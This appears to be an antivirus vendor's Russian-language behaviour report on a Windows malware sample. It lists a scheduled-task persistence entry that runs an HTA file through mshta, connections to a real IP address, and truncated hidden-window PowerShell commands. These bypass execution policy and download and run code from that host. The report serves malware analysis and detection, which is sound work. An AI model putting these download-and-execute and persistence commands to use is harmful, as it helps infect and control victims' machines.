Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\5aeb2345-7268-4e25-aab8-0cdcbad4b5d4
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tdmnjagin.hta
Сетевая активность
Подключается к
- '79.##4.91.85':80
TCP
Запросы HTTP GET
- http://79.##4.91.85/1txt/15853
- http://79.##4.91.85/3txt/1
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnADsAJgAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAb...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass SI Variable:DRO ([Net.HttpWebRequest]::Create('http://79.174.91.85/1txt/15853').GetResponse().GetResponseStream());SI Variable:U3 '';Try{While(1){(GV U3).Value+=[Char](GCI Variable:/...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnADsAJgAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAb...
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC HOURLY /TN 5AEB2345-7268-4E25-AAB8-0CDCBAD4B5D4 /TR "<SYSTEM32>\mshta.exe %TEMP%\tdmnjagin.hta"
- '%WINDIR%\syswow64\mshta.exe' %TEMP%\tdmnjagin.hta
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass SI Variable:DRO ([Net.HttpWebRequest]::Create('http://79.174.91.85/1txt/15853').GetResponse().GetResponseStream());SI Variable:U3 '';Try{While(1){(GV U3).Value+=[Char](GCI Variable:/...
